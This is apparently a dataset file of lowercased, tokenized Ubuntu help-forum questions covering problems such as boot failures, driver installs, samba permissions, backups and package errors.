444344	how to copy a part of a line to another position	i have about 100 print statements in a file like this : printf ( `` % f \n\n '' , row1.req_pnttime ) ; i want to copy the variable name inside the string so that it becomes like this printf ( `` row1.req_pnttime : % f \n\n '' , row1.req_pnttime ) ; can anyone help me do this ? ps-the length of the variable name is different for every print statement so i need a generic way to do this .
444345	not able to see pr_info output	i have added some pr_info statements in some source code files like driver/usb/core/generic.c , message.c , usb.c , hub.c , driver.c . when i run make modules ; make modules_install ; make install i am not able to see any output when i run dmesg whenever i attach a flash drive . and i can see all the above files along with same files with .c~ extension which do n't have those pr_info statements .
444346	installing dacapo on ubuntu	i have got installed python-ase on my ubuntu desktop but do not know how to get it working with dacapo code . the website says preferably install as rpm/deb . configure the repositories https : //wiki.fysik.dtu.dk/ase/download.html # installation-with-package-manager-on-linux and install the dacapo package using your distribution package manager . on debian/ubuntu you may need additionally to set the dacapopath , dacapoexe_serial and dacapoexe_parallel variables . no further steps are necessary , please stop reading now !
444348	eclipse hangs on xubuntu 13.10	this is for the version on apt . when eclipse is run from the command line , nothing happens until i send the process a sigint . i 've tried adding -consolelog -debug , but that does n't produce any output either . has anyone else ran into this issue ?
444352	required exact detailed information about installing ubuntu on usb and using remaining space of usb for storing files	& nbsp & nbsp hello guys , i want to learn more about ubuntu , hence i am looking forward to install full version of ubuntu 12.10 on my 16 gb usb . except using it for ubuntu , i want to use it for other work like storing files in ubuntu as well as windows . & nbsp & nbspi knew that minimum 5 gb space is required to install ubuntu , so i want to use the remaining space that should be 11 gb for storing files . & nbsp & nbsp now , i have searched a lot on internet about how to make a such a bootable usb which can use for other work also , but i got confused . because many have said different stuff like usb should have a persistent file , some says something like `` casper -rw '' , but i did n't get it , because i am new to this . & nbsp & nbsp so , i want to know is there anyone who can help me according to my usb size ?
444353	unable to uninstall ubuntu 12.04 from wubi	i have installed ubuntu 12.04 using wubi , i lost my user interface on ubuntu after uninstalling pyhon by mistake ... now i want to uninstall ubuntu but uninstall-wubi is not diong anything after double clicking on it ... what should i do now
444354	how do i install x13-arima-seats for rstudio from source ?	hello all and thanks for interest ! im trying to install x13-arima-seats to be used with rstudio . there are compiled version for redhat and source available . i have followed these steps from the official manual http : //cran.r-project.org/web/packages/seasonal/readme.html . ( links to all packages can be found from this manual because i could n't add more than 2 links ) : to install the stable version directly from cran , type to the r console : install.packages ( `` seasonal '' ) seasonal does not includes the binary executables of x-13arima-seats . they need to be installed separately from here ( windows , filename x13asall.zip ) or here ( linux , filename x13asall.tar.gz ) . my own compilation for mac os-x can be obtained upon request . download the file , unzip it and copy the folder to the desired location in your file system . next , you need to tell seasonal where to find the binary executables of x-13arima-seats , by setting the specific environmental variable x13 path . this may be done during your active session in r : sys.setenv ( x13_path = `` your_x13_directory '' ) anyway im stuck when i should compile extracted `` x13asall.tar.gz '' . root @ t420s : /home/jori/downloads/x13asall # make make : *** no targets specified and no makefile found . stop . root @ t420s : /home/jori/downloads/x13asall # ./configure -bash : ./configure : no such file or directory root @ t420s : /home/jori/downloads/x13asall # i used google and found this : http : //iristoolbox.codeplex.com/discussions/528902 # post1202601 which use `` x13assrc.tar.gz '' -package for building . after modifying makefile.g77 as follow i get the same results cd /path/to/x13assrc/folder gedit makefile.g77 fc = /usr/bin/gfortran # `` which gfortran '' gives this address linker = /usr/bin/gfortran root @ t420s : /home/jori/downloads/x13assrc # make make : *** no targets specified and no makefile found . stop . root @ t420s : /home/jori/downloads/x13assrc # ./configure -bash : ./configure : no such file or directory root @ t420s : /home/jori/downloads/x13assrc # an additional info from my laptop root @ t420s : /home/jori/downloads/x13assrc # gcc -- version gcc ( ubuntu 4.8.1-2ubuntu1~12.04 ) 4.8.1 rstudio : version 0.98.495 ubuntu release 12.04 ( precise ) 64-bit kernel linux 3.8.0-26-generic maybe im missing some very basic things because i have always been able to install all the softwares from different repos . please help , i need this package for one statistic course .
444355	locate partial file name mlocate	i want to find a file using locate command . i 'm not much sure the file name . i have following files in 3-4 folder in my home directory . prvl_securities_0200_h240401.html prvl_termleasehold_0000_h200401.html prvl_trees_0000_hxx0401.html prvl_trustbeneficiaryright_0000_h220401.html prvl_unlistedsecurities_0101_h250527.html prvl_unlistedsecurities_0102_h250527.html prvl_unlistedsecurities_0200_h250527.html prvl_unlistedsecurities_0300_h250527.html prvl_unlistedsecurities_0400_h250527.html prvl_unlistedsecurities_0500_h250527.html prvl_unlistedsecurities_0600_h250527.html i 'm looking for a files containing word `` security '' or `` securities '' . i want exact path of the file . how can i do that using locate comand ?
444360	is it possible to stream one 's desktop to youtube live event ?	the goal is to run the live event , but not from one 's webcam , but rather streaming the contents of the desktop . how would i go about doing that under ubuntu gnu/linux ?
444362	unable to sign in to windows live online account	i 'm trying to sign in to my windows live account through system settings â online accounts . after entering my credentials i can see the page asking me to allow ubuntu access the account . after it , i see the initial page and account does not appear . that 's what i see in the console : ( gnome-control-center:4915 ) : account-plugin-warning ** : authsession error : gdbus.error : com.google.code.accountssso.singlesignon.error.noconnection : host not found ( gnome-control-center:4915 ) : credentials-cc-panel-critical ** : cc-credentials-authorization-page.vala:182 : error completing auth session process : gdbus.error : com.google.code.accountssso.singlesignon.error.noconnection : host not found the same happens with google account . can anyone explain what happens and how do i connect to my accounts ?
444367	crojob not recognizing ip command	i have this script to gather data trx rates . if i run this script normally , it executes fine . however , if i add this to cronjob to execute every hour , i get an error in the /var/log/ server=`hostname -s | cut -c 7-11` output_file1=/mnt/server0stat.txt output_file2=/mnt/server1stat.txt if [ $ server == `` server0 '' ] ; then echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- - '' > > $ output_file1 date > > $ output_file1 /sbin/ip -s -s link > > $ output_file1 echo `` success ! '' exit 0 ; fi if [ $ server == `` server1 '' ] ; then echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- - '' > > $ output_file2 date > > $ output_file2 /sbin/ip -s -s link > > $ output_file2 echo `` success ! '' else echo `` $ server is not the correct server . please run on the correct server '' fi however , if i add this to cronjob to execute every hour , i get an error in the /var/log/messages , i get this error , line 13 : ip : command not found . any idea why this is happening ? ps : i can not install vnstat as its not allowed . : )
444369	ssl on ubuntu server 13.10	i am building an ubuntu home server and would like to enable ssl for access via https . i have attempted to follow these instructions but when i try to enable ssl i get this error error : site default-ssl not properly enabled : /etc/apache2/sites-enabled/default-ssl.conf is a real file , not touching it does anyone have any idea 's that might shed light on how i could resolve this ?
444371	slow booting of ubuntu 12.04	i am facing a problem of slow booting in ubuntu 12.04lts -64bit . currently i am using samsung np300e5x-s01in , 4gb ram , 60gb ext4 ubuntu partition , 2gb swap , dual boot with win 7 . currently my kernel version is 3.8.0-36-generic although its dual boot i use only ubuntu . a few times i also receive a message on booting screen saying the disk for /tmp is not ready yet . as suggested by devs , i have installed bootchart which created this png image . unfortunately i am not getting what could be the possible problems by looking into this image . any pointers or help would be appreciated . also if someone needs my dmesg log to see what happens , have a look here - http : //pastebin.com/ngnvxxcb . i guess there is some problem after line number 770 but i do n't know what it is .
444376	is it possible to make bootable usb for ubuntu touch ?	i own an akoya p2212t ( intel celeron n2920 , fhd touchscreen with usb port ) and have tried booting ubuntu desktop and it works . now i would like to try out ubuntu touch on this device . but , how do i make a bootable usb from the daily images of trusty ( tar/zip ) ? as far as i can see , instructions are only available to flash android-based tablets . is it possible to make bootable usb for ubuntu touch ?
444378	how to resolve depedancy issues with software not obtained from a repository	ok so i have found that the ubuntu software centre has excessively outdated builds posted for nearly every piece of software i attempt to install . the only solution i can think of is to download the most recent releases from the official page . i had this problem with blender , and managed to find a post that had me update the package manually ( a pre made one liner ) . now im attempting to install an android development env . i downloaded the adt bundle for linux 64 bit , inside was a zip folder . i attempt to run the executable file from the gui and nothing happens . when i run it from the shell it gives me an error that i believe is related to missing dependencies . so heres the question : how do i properly install a piece of software that does not come in a package intended for use with a software manager ? by properly i mean i want it installed as if it was installed by a package manager ... i want the icons , i want the links in the dashboard , i want the dependencies ... edit before someone says it , yes i have run sudo apt-get install eclipse sudo apt-get update sudo chmod +x path/to/bin sudo path/to/bin edit '' impossible '' = `` unacceptable '' in my eyes . i want to properly install the latest releases on ubuntu . it is possible ? it may be difficult but how do i do it ? i have been trying to find answers to this question for a while now and it seems like an industry secret that no one will tell me ... .
444379	usb backup drive does not show up complete after a successful dd backup	i performed a server backup ( ubuntu 13.10 ) via dd onto an external usb-drive . no error messages . sudo lshw -short . /0/1 scsi0 storage /0/1/0.0.0 /dev/sda disk 500gb st500lt012-9ws14 /0/1/0.0.0/1 /dev/sda1 volume 486mib windows fat laufwerk /0/1/0.0.0/2 /dev/sda2 volume 244mib efi partition /0/1/0.0.0/3 /dev/sda3 volume 465gib lvm physical volume /0/2 scsi6 storage /0/2/0.0.0 /dev/sdb disk 1tb external usb 3.0 /0/2/0.0.0/1 /dev/sdb1 volume 486mib windows fat laufwerk /0/2/0.0.0/2 /dev/sdb2 volume 244mib efi partition /0/2/0.0.0/3 /dev/sdb3 volume 465gib lvm physical volume unfortunately , i do n't see the complete drive anymore on the unity-desktop - only the part /dev/sdb2 as : datentr채ger 256 mb the same goes , if i klick to 'personal' what am i doing wrong ? i booted ubuntu from a usb-stick . via terminal i typed in sudo dd if=/dev/sda of=/dev/sdc the complete internal drive was copied without error
444382	export $ path not working correctly on ubuntu 13.10	i have connected to remote linux desktop ( ubuntu 13.10 ) using ssh command and try to run following command on remote desktop . on my host machine i am using ubuntu 12.04 . on remote desktop : i have copy of friendlyarm board 's toolchain at '/home/linuxuser/friendlyarm/opt/friendlyarm/toolschain/4.5.1/ ' location . i open a terminal set path environment variable by , $ export path=/home/linuxuser/friendlyarm/opt/friendlyarm/toolschain/4.5.1/bin : $ path now try to run my hello.c program by $ arm-linux-gcc hello.c i got error : -bash : /home/linuxuser/friendlyarm/opt/friendlyarm/toolschain/4.5.1/bin/arm-linux-gcc : no such file or directory i run following command for some more information $ echo $ path /home/linuxuser/friendlyarm/opt/friendlyarm/toolschain/4.5.1/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games $ ls -l ~/friendlyarm/opt/friendlyarm/toolschain/4.5.1/bin/arm-linux-gcc lrwxrwxrwx 1 linuxuser linuxuser 26 sep 28 2010 /home/linuxuser/friendlyarm/opt/friendlyarm/toolschain/4.5.1/bin/arm-linux-gcc - > arm-none-linux-gnueabi-gcc ls -l ~/friendlyarm/opt/friendlyarm/toolschain/4.5.1/bin/arm-none-linux-gnueabi-gcc -r-xr-xr-x 2 linuxuser linuxuser 249588 sep 24 2010 /home/linuxuser/friendlyarm/opt/friendlyarm/toolschain/4.5.1/bin/arm-none-linux-gnueabi-gcc
444384	firefox closing automatically after logout vnc connection	firefox is closing automatically after logout vnc connection . how can i set firefox to run all the time , and not only when i am connected through vnc ?
444388	mouse curser disappearing on login	for some reason the mouse did n't appear on login but appeared fine enough when i did log in . there were also several other problems like text being cut in half or something . so i decided to do the good old trick of turning it off and then back on ( although i had to do a hard reset since it got stuck ) . after turning back on the usual weird stuff happened like it 'd flicker between a black screen and the gnome splash screen and then eventually right back to login . well doing seemed to have fixed all the problems except for the mouse has still disappeared on login . i tried updating and using the command gsettings set org.gnome.settings-daemon.plugins.cursor active false but neither had worked . tl ; dr mouse wo n't appear on login , tried fixes , did n't work . edit : i 've installed trusty tahr over 13.10 and the problem seems to have solved itself
444391	philips mfd 6050 printer installation ubuntu 12.04	i 'm experiencing difficulties with the installation of the philips mfd 6050 printer/scanner on a lenovo laptop with ubuntu 12.04 64 bit . official drivers can be downloaded here . they were for ubuntu 7.10 originally . i stumbled upon this forum threat , where someone described a problem similar to the one i 'm having . following the suggested solution steps there : change the install script to link the correct library like so : ln -sf /usr/lib/libstdc++.so.6.0.9 /usr/lib/libstdc++.so.5 install the printer selecting the installed ppd file only gets me so far as that computer and printer are communicating ( printer is 'starting up ' if i print , but it always aborts before even touching the paper ) , but i do n't actually get to print anything . i 'm new to ubuntu . if someone could point out some help it would be greatly appreciated .
444393	networking does n't start after upgrade with new upstart system	i have upgraded to the stable version of ubuntu server and my network does n't start . there should be some problem with the new upstart service , because the network seems to try to load a dhcp , but i have configured a static ip in the networking configuration files . i try to run /etc/init.d/networking start , but the response is that this is not the correct command . so i try service networking start and the answer is that the job does n't exists . however , i can see the networking file in the init.d and in the init folders . i try service networking status and the process response is that the service is stopped . i have rebooted the server and the problem persists . i only get the network working manually with the ifconfig command line suggestions ?
444394	what is the meaning of 'i686 ' in ubuntu ?	to check whether i am using 32bit or 64bit ubuntu . i looked in how do i check if i have a 32-bit or a 64-bit os ? and found this answer uname -a . if it is shown as i386 , it will be 32bit and amd64 , it will be 64 bit , but i got this result : linux mukund-thinkpad-edge-e431 3.8.0-35-generic # 50-ubuntu smp tue dec 3 01:25:33 utc 2013 i686 i686 i686 gnu/linux what is this i686 ? is it 32bit or 64bit - i think it is 32bit , because all the debian packages which i installed in it are of 32bit , so can anybody please give a detailed explanation .
444395	how to repair upgrade from 13.04 to 13.10	i launched an upgrade on my sister 's computer like ubuntu asked to , in order to get from 13.04 to 13.10 . it seems the upgrade is blocked at the stage where it 's downloading some flash-plugin thing . i do n't want to reboot the system right away as i assume this will break everything and i would n't know how to repair it ? please this is urgent .
444396	ubuntu 12.04 - keeping dolphin open hogs cpu by kdeinit	i use ubuntu 12.04 on a dell inspiron laptop . if i open and keep a dolphin open , one of my cores is used 100 % and this quickly leads to high temperatures . when i use htop and see what is hogging the cpu , the culprit process is kdeinit4 : kio_thumbnail [ kdeinit ] thumbnail local : /tmp/ksocket-vega/klaunchermt2333.slave-socket local : /tmp/ksocket-vega/dolphinz32280.slave-socket ( vega is my username ) . this process stops if i close doplhin or disable thumbnails in dolphin . is there any way to fix this keeping the thumbnails on ? is it generating the thumbnails on the fly rather than using a cache ?
444398	installing saga-gis wants to remove packages	trying to install saga-gis ( saga 2.1.0+dfsg-1build2 ) using the software center in ubuntu 14.04 ( 64bit ) . the problem is that the software center tries to remove : -libgdal1 -libopenscenegraph80 -libosgearth1 -libqgis2.2.0 -qgis -qgis-plugin-globe -qgis-plugin-grass -qgis-providers how can i avoid uninstalling those other programs ?
444400	ca n't login to lubuntu 13.10	after installation of lamp + myphpadmin accord to this tutorial install lamp , i ca n't login to my account . i see my login screen ( with prompt enter login + password ) . but after entering it shows me strange error prompt , but so fast that i ca n't read what exactly happen . and return again to login screen . i used cntrl + alt + 1 - login to shell . and tried to view /var/log/ logs . where exactly should i looking for trouble ? maybe exist other ways to figure out what is wrong ?
444402	avoid upgrade to software beta versions	today my update manager in ubuntu 12.04. updated r to the latest version called `` r version 3.1.0 beta ( 2014-03-28 r65330 ) -- `` spring dance '' '' i had a lot of trouble after the upgrade and i needed to manually downgrade the r-core again as described here is there a way to avoid upgrades to beta versions ?
444407	virtualbox extendable hard drive	i installed ubuntu 13.10 on virtualbox ( host machine win7 ) . i chose ubuntu 13.10 because i wanted to install qt5 on it . i use an extendable hard drive , but for some reason , when i install something with apt get , it tells me i ran out of disk space . is this issue related to ubuntu , or to virtualbox ? how can i solve this ? and also : is it possible to install qt5 on ubuntu 12.04 lts as well as 13.10 ?
444408	how to set permissions to guest account in ubuntu 13.10	i am using ubuntu 13.10 . i would like to give any user who logs in as guest the permission to read from the harddisk , without having to enter the password . however , guest users should not have the permission to write to the harddisk or delete files from it . how can i do that ?
444413	restrict samba share permission in subfolder	i am new here and i just setup my first ubuntu samba server and testing it now ... now i have a question about samba to ask : we have a situation like this : a share projects for everybody full access to anyone . there is a subdirectory under share projects â /home/samba/share/projects/projectx . i want restrict the access to this subdirectory to a group manager only . anonymous users not listed in manager group should not able to access the subdirectory . i tried to change permissions and it seems does n't work . it looks like the permission is always inherit from the upper level projects share . so could someone give me a help to solve my problem ? thanks a lot .
444418	ubuntu 12.04 - problem after manually installing nvidia drivers , unity issue	after manually installing nvidia drivers ( downloading nvidia .run driver ) laptop model - dell inspiron 14 3421 video card - nvidia geforce gt 625m i could still access the side bar ( unity ) / here 's what i did 1080 sudo service lightdm stop 1081 vi install.txt 1082 sudo init 3 1083 ./nvidia-linux-x86_64-331.49.run 1084 sudo ./nvidia-linux-x86_64-331.49.run 1085 ls -l 1086 vi install.txt 1087 sudo service start lightdm 1088 sudo start lightdm issues whenever i switch windows ( ctrl+arrow keys ) the transition effect is gone alt+tab window preview is missing need help guys ! lspci | grep vga results : none there used to be a intel chipset returned here before i installed the nvidia driver here 's some additional info . hope this helps . jiii @ jiii-jump : ~ $ lspci -nn |egrep `` vga|display '' 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 )
444420	how to add `` exotic '' keyboard layouts on ubuntu ?	checking the load-extra-items at org.gnome.libgnomekbd.desktop ( via a.g. dconf-editor [ ) . unfortunately it still does n't work for me . can anyone help me with some walkaround ( i 'd like to enable the polish ( international with accents ) keyboard layout ) .
444425	file recovery and system repair	my staging server , an ubuntu 13.04 , crashed and i need to recover some web files . i tried doing the boot-repair for 5 times now , but every time i run the boot-repair , the recommended repair option is not showing . my only option was create boot summary and my last boot-repair report is at http : //paste.ubuntu.com/7216185/ . i am using an acer aspire 3610 .
444426	dropbox wo n't start anymore	since a while , 2 weeks , dropbox does not startup anymore on my laptop running ubuntu 13.10 with gnome classic . this is different from dropbox wo n't start anymore . after installation , a dialog appears , telling me that i need to install dropbox , and starts downloading something . after that 's done , a dialog appears that nautilus has to be restarted . after clicking `` restart '' , nautilus seems to restart ( blinks ) but then , nothing happens , and after a while , the same dialog appears again . reinstallation from the repo does n't fix . reinstallation from the downloaded .deb package does n't fix .
444428	/etc/sudoers.d : too many open files during npm install	when i ran npm install the first time , it suddenly slowed down my system to a crawl . moving the cursor would take about 30 seconds to register on screen . evenually npm finished with a failure and running it again produced an unusual error . so rare that there are only two results on google ( and were n't helpful either ) . $ sudo npm install sudo : > > > /etc/sudoers : /etc/sudoers.d : too many open files near line 29 < < < what does this mean and how to resolve this issue ?
444433	can installing lubuntu instead of ubuntu help in decreasing the processing time of my program on an embedded system ?	i 've written a machine vision processing algorithm on an embedded board which is going to be installed in the outdoor environment . the embedded system consists of an intel atom dual core processor which clocks at 1.8 ghz and has 4 gb of ram . my algorithm needs qt and opencv to be installed on the operating system to run properly . can installing lubuntu instead of ubuntu help in decreasing the processing time of my program ? for example , could i have a 20 % or more reduction in my algorithm processing time by just replacing ubuntu with lubuntu ? if yes , how could it be measured before installing lubuntu on my embedded board ? i want to know if there 's a huge reduction by just removing some fancy features of ubuntu since i 'm not going to use them at all . if not , i do n't want to bother my self installing lubuntu and perform all the tests again .
444434	install intel gma 3150 graphics drive	google earth requires graphics drivers . the intel driver provided from the intel website is not supported by ubuntu . my card is intel gma 3150 . how do i install drivers for this card in ubuntu ?
444436	rrm ( radio resource management ) in wlan	i am started to work on rrm . by reading 802.11k i understood that some information elements we need to add . as well as some new frames ( beacon request/report , frame request/report ) need to be added . is this frames belongs to management frames/control frames ? ? if its management then how to implement in hostapd ? please help me out of this ?
444437	getting highest value in files and storing the next values as per desired count	let us say i have counter , which is variable . for clarity , counter = 3 . and i have files with different values : file 1 3 4 8 file 2 2 3 4 5 file 3 11 13 15 file 4 19 29 34 my desired output is a variable max= 34 need to be printed . also based on count=3 , in this case i should able to store next values in variables variable a= 35 variable b =36 variable c =37 and print them . i tried different codes with if - > then etc , but nothing coming closer . can someone give me pointers ? this was the code i last tried f1mx = `cat file1 | grep `` . '' | tail -1` f2mx = `cat file2 | grep `` . '' | tail -1` f3mx = `cat file3 | grep `` . '' | tail -1` f4mx = `cat file4 | grep `` . '' | tail -1` if [ $ f1mx \ > $ f2mx ] ; then f12mx= $ f1mx else f12mx= $ f2mx ; fi ; if [ $ f3mx \ > $ f4mx ] ; then f34mx= $ f3mx else f34mx= $ f4mx ; fi ; if [ $ f12mx \ > $ f34mx ] ; then fmax= $ f12mx else fmax= $ f34mx fi ; echo `` fmax '' i=0 while [ $ i -le $ counter ] ; do a [ $ i ] = $ fmax+1 echo $ a [ $ i ] ; let i=i+1 done
444440	ubuntu 13.10 keyboard shortcuts being ignored	as i was unable to specify some keyboard shortcuts ( e.g . lock computer and show desktop - my changes were being ignored after rebooting ) through ubuntu 's system settings , i installed compizconfig-settings-manager and xbindkeys . unfortunately this happens to have caused some other shortcuts to break and i 'm now unable , for example , to move between workspaces . i have already confirmed both via dconf editor and org.gnome.desktop.wm.keybindings and compizconfig-settings-manager , that move-to-workspace-* entries have the right configuration , still the shortcuts do n't work even after reset and rebooting . i have also uninstalled compizconfig-settings-manager and xbindkeys , expecting that would revert the new problem but that did n't happen . additionally i went through the hotkeys troubleshooting guide ( https : //wiki.ubuntu.com/hotkeys/troubleshooting ) and confirmed that the keypress events are being correctly identified . is there any `` deterministic '' way to configure shortcuts in ubuntu 13.10 or at least debug them so i know what is causing them to be ignored ?
444442	undefined symbol : initpansistrings	i am trying to install a program called reportman . i have made a directory and untarred it , but when i try to run it i get : ./repmand : symbol lookup error : ./repmand : undefined symbol : initpansistrings the few pages i found on the internet say the solution is to move libborqt-6.9-qt2.3.so to /lib/ or to /lib32/ but this does not work for me , i still get the same error message . i am using 13.10 , does someone have any ideas for me ?
444443	ubiquity segfaults every single time ( custom distro )	having recently created a custom distro ( ubuntu 14.04 server + windowmaker + some additional boilerplate code ) using remastersys/relinux ( i tried both ) , i 'm now seeking to install it on another system . unfortunately , whenever i try to run ubiquity through a terminal , i get the following message right after authentification . `` *error in /usr/bin/python3 : malloc ( ) : smallbin double linked list corrupted : 0x09d84770 * segmentation fault '' . what could be the reason for this and how would i happen to fix it ?
444446	publish a qml/c++ application as a click package	i 've written an application which i would like to publish as click package . all the guides and prepared projects mention plain qml applications only . my application furthermore depends on a shared library ( taglib in my case ) . is there any guide which i could follow ? thank you !
444450	bootable usb is not detected - ubuntu	my asus eee was on windows 7 . i passed on ubuntu by instaling from bootable usb . in meanwhile i get problem with grub rescue and i wonted to instal ubuntu again . i change priority in bios and i used bootable usb , same one wich i used first time when i instal system . but pc is not detecting usb . problematic asus is detecting connected keybord , for example and bootable usb is ok working on other pc . any help ? asus eee doesnt have entery for cd .
444455	install ubuntu to a 15gb partition	i know this question is quite basic , but i am really new to linux and trying to install ubuntu 12.04 on my lenovo y510p laptop which already have windows 8 installed on it . what i want to do is to install ubuntu to 15 gb partition which i made using disk management utility . and i want it to dual boot to windows/ubuntu whenever i want . is this possible ? i previously installed it alongside with windows , but the problem with that was it automatically made a 250 gb partition out of one of my 600 gb partition and installed ubuntu on that partition . i want to allocate only 15 gb to ubuntu as i will be using it for tasks like programming only , and will use windows 8 as my primary os . also i do n't want to install it on vm .
444457	how to install pulseaudio 5 on ubuntu	guys how i can install pulseaudio 5 ? i do n't understand the installation step on this link http : //www.linuxfromscratch.org/blfs/view/svn/multimedia/pulseaudio.html anybody can tell me how to install it ?
444461	ubuntu 12.04 | display issues with dell gx620	i recently installed ubuntu 12.04 on dell gx620 . i 'm not able to change the resolution from 'display ' . i have already tried the following method : modeline `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync xrandr -- newmode `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync xrandr -- addmode vga1 `` 1280x1024_60.00 '' xrandr -- output vga1 -- mode 1024ă768 it works fine . but when the computer restart it shows an error and goes back to the previous resolution . please help me figure out what it is . if it is a driver-issue , please point to the right direction to find the right driver .
444462	volume over 100 % advertised as *new* feature	i 've seen in a video about 14.04 that in this release you can set the volume over 100 % . however i 've always been able to do so . since i can do it from 2 different laptops , i do n't think i 'm the only one who can do this . is this information inaccurate or i am missing something ?
444463	e : the value 'saucy ' is invalid for apt	i tried to upgrade from 13.10 to 14.04 ( beta2 ) . it was mainly successful , but there was an error concerning libpostproc52 . i did n't pay too much attention at the time ( i know , bad idea , but there were other things going on ) . by and large , the upgrade is fine , except i have two problems with package management . 1 ) with synaptic i get : e : the value 'saucy ' is invalid for apt : :default-release as such a release is not available in the sources e : _cache- > open ( ) failed , please report . i 've cleaned the software sources to only include canonical & independent sources . with synaptic in non-super user mode , vlc-nox shows as broken . 2 ) with apt-get -f install , i get : dpkg : error processing archive /var/cache/apt/archives/libpostproc52_6 % 3a0.git20120821-4_amd64.deb ( -- unpack ) : libpostproc52 : amd64 6:0.git20120821-4 ( multi-arch : no ) is not co-installable with libpostproc52 which has multiple installed instances i think the second is related to some combination of vlc and ffmpeg . i 've tried various combinations of -f , clean , remove , etc . with apt-get to no avail . i ca n't figure out if these two are related or not , but if i can solve the first problem , then i can probably solve the second . the real question is who or what is generating the 'saucy ' reference in synaptic ? any suggestions ? problem 1 ) solved : edit ( change `` saucy '' to `` trusty '' ) /root/.synaptic/synaptic.conf problem 2 ) solved : `` dpkg -p fubar '' to delete unruly package ; unrelated to 1 ) . apparently , i can not label the title as solved !
444479	launch hadoop cluster in openstack	i have installed openstack by cloning devstack along with sahara . now i want to know that is there a way to launch a hadoop cluster and execute a simple php program by using only gui ? i have seen tutorials that are using terminal but i want it from gui .
444482	is it possible to save session in ubuntu ?	is it possible to save session in ubuntu ? i mean when you switch it on and off or simply restart it and after logging in the screen looks exacly the same as before ( with all windows open , and application running ) ? same as going back from 'suspend ' mode . so you can continously work on the same pc ?
444484	broadcom card-reader bcm57765/bcm57785 does n't work on ubuntu `12.04 lts	i 'm having a hard time with this one . i have an acer aspire one 756 and installed ubuntu 12.04 lts on it . everything works ( with a little tweaking here and there ) , but unfortunately the build-in card-reader terrebly fails . i know that the bcm57765/bcm57785 is a combined card-reader / wired-lan 1gbps module . the wired lan works fine , but the card-reader fails . it seems to be recognised , but i ca n't access any sd card . as it does n't even recognise it in tools like mountmanager , the problem seems deeper than just an auto-mount problem . can anyone help me out ? i really need this to work , and there seem to be a lot of people having issues with linux and card-readers , but unfortunately i have n't found a solution yet . lspci output : 04:00.1 sd host controller : broadcom corporation bcm57765/57785 sdxc/mmc card reader ( rev 10 ) lspci -v : 04:00.1 sd host controller : broadcom corporation bcm57765/57785 sdxc/mmc card reader ( rev 10 ) ( prog-if 01 ) subsystem : acer incorporated [ ali ] device 0742 flags : bus master , fast devsel , latency 0 , irq 19 memory at c0400000 ( 64-bit , prefetchable ) [ size=64k ] capabilities : [ 48 ] power management version 3 capabilities : [ 58 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ ac ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 150 ] power budgeting < ? > capabilities : [ 160 ] virtual channel kernel driver in use : sdhci-pci kernel modules : sdhci-pci dmesg without sdcard inserted : [ 1.192432 ] sdhci : secure digital host controller interface driver [ 1.192436 ] sdhci : copyright ( c ) pierre ossman [ 1.192771 ] sdhci-pci 0000:04:00.1 : sdhci controller found [ 14e4:16bc ] ( rev 10 ) [ 1.192843 ] sdhci-pci 0000:04:00.1 : invalid iomem size . you may experience problems . [ 1.192955 ] mmc0 : no vmmc regulator found [ 1.193030 ] registered led device : mmc0 : : any suggestions ? best regards , guus
444485	the debian administrator book , install	i have downloaded the book in the software center , but i cant open it , what do i do ? i have installed calibre , but it does n't help
444489	hdd failure recovery : déjà dup vs rsync	i want my data to be prepared as much as possible for a hardware failure ( especially hdd crash ) . i 've already `` lost '' in the past 2 hdds , so i know the frustration that comes with it . i am already using déjà dup for more then a year now , backing up /home and /etc on a daily basis to an external hdd . suppose i will have a hdd failure in the near future . is my assumption correct about the next steps that have to be taken ? : re-install ubuntu . using déjà dup simply restore /home folder . is it a straight forward process ? on a side note , the entire back-up process is aimed for full recovery . i am not that interested in the incremental back-up process . it 's nice to have , but it does n't help me in case of a crash . taken into account that my main aim is a full recovery , would n't it be simpler if i were to use rsync ? sudo rsync -azvv /home/ /external-hdd then cron the above command to run on a daily basis . aditional questions : does it make sense to back-up a secondary ntfs drive that is mounted on my system using rsync ? can déjà dup handle back-up of mounted ntfs drives ? thanks .
444490	help for this non-tech guy	i would like to download ubuntu as a solution for the end of windows xp . i have 1gb of ram plus 80gb of hard drive space available . i would like to try ubuntu and not get rid of windows xp at the present time . i am told i can have both oss on my computer at once ( dual boot ) . i was also told to download the ubuntu iso , then i can put the iso file onto a dvd or flash drive . then i have to use either one to run ubuntu from or install it from either one to my hard drive . i do n't want to screw things up , but i need to understand all this as all i presently only use my computer for is email , ebay and web searches . there 's no tech person here , so i need it explained in simple steps to understand what i 'm in for .
444497	problem with installing ubuntu 13.10 in latest edtion laptops	last week i download ubuntu iso image and burn it in dvd . i have a hp i3 laptop ( 2d28 tu ) with 2gb with ram.+ window 8.1 pro . when i m trying to install it first option comes that select the language , after that i try both option ( trying ubuntu or installing ubuntu ) but screen turned into black . pl z give me proper installing method i m waiting for solution and also what i require to disable or which feature i require to disable thanks in advance
444498	startup stopped at xinerama - normal ?	for an unknown reason when i rebooted my computer it stopped working . i see it can start the graphics engine as it shows the looping cursor and i can even move it , but the login screen does not appear . i have two screens and both are working fine , since i can move the mouse around both as usual . using another tty , i noticed that the mdm logs have stopped when xinerama was being loaded . is this right , or actually was xinerama crashing ? in any case , is there any hint where i could look for info on what made the login stall ?
